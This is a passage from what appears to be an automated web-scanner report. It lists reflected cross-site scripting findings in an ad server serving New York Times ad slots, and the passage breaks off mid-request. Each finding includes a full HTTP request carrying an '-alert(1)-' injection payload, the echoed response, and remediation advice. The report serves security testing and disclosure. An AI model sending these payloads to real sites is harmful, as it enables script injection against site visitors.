Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2951d"-alert(1)-"f11c4fafd07&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=
...[SNIP]...

4.45. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe6d8'-alert(1)-'94632e14065 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As with the double-quote variant of this finding, the request below shows the payload appended to the type=goto value in the click-through URL's query string rather than to the sz=300x250 path parameter; re-test against that query-string position.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotofe6d8'-alert(1)-'94632e14065&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotofe6d8'-alert(1)-'94632e14065&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=
...[SNIP]...

4.46. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cfd7'-alert(1)-'0203b74b4cd was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.21cfd7'-alert(1)-'0203b74b4cd&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:29 GMT
Expires: Mon, 15 Nov 2010 07:24:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
cs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.21cfd7'-alert(1)-'0203b74b4cd&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.47. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d961"-alert(1)-"dd73ef3e141 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.22d961"-alert(1)-"dd73ef3e141&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:25 GMT
Expires: Mon, 15 Nov 2010 07:24:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6110

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
cs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.22d961"-alert(1)-"dd73ef3e141&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallo
...[SNIP]...

4.48. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d9ae"-alert(1)-"9a6023687c5 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt12d9ae"-alert(1)-"9a6023687c5&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:16 GMT
Expires: Mon, 15 Nov 2010 07:24:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt12d9ae"-alert(1)-"9a6023687c5&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
v
...[SNIP]...

4.49. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d704d'-alert(1)-'065e3ddce1 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1d704d'-alert(1)-'065e3ddce1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:20 GMT
Expires: Mon, 15 Nov 2010 07:24:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1d704d'-alert(1)-'065e3ddce1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.50. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d4a8"-alert(1)-"bf65b757742 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=9d4a8"-alert(1)-"bf65b757742 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:09 GMT
Expires: Mon, 15 Nov 2010 07:25:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6109

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=9d4a8"-alert(1)-"bf65b757742http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH =
...[SNIP]...

4.51. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae97'-alert(1)-'f24b1a0321 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=1ae97'-alert(1)-'f24b1a0321 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:14 GMT
Expires: Mon, 15 Nov 2010 07:25:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=1ae97'-alert(1)-'f24b1a0321http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.52. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a188e"-alert(1)-"43fe46b40e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&a188e"-alert(1)-"43fe46b40e2=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:18 GMT
Expires: Mon, 15 Nov 2010 07:25:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6122

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&a188e"-alert(1)-"43fe46b40e2=1http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH
...[SNIP]...

4.53. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b4d'-alert(1)-'76af0dd89ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&38b4d'-alert(1)-'76af0dd89ac=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:23 GMT
Expires: Mon, 15 Nov 2010 07:25:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6121

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&38b4d'-alert(1)-'76af0dd89ac=1http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.54. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4522"-alert(1)-"26b2214d3e was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye4522"-alert(1)-"26b2214d3e&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:29 GMT
Expires: Mon, 15 Nov 2010 07:23:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
448%3B3454-728/90%3B38208490/38226247/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye4522"-alert(1)-"26b2214d3e&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexp
...[SNIP]...

4.55. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92149'-alert(1)-'093ff1d54f7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory92149'-alert(1)-'093ff1d54f7&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
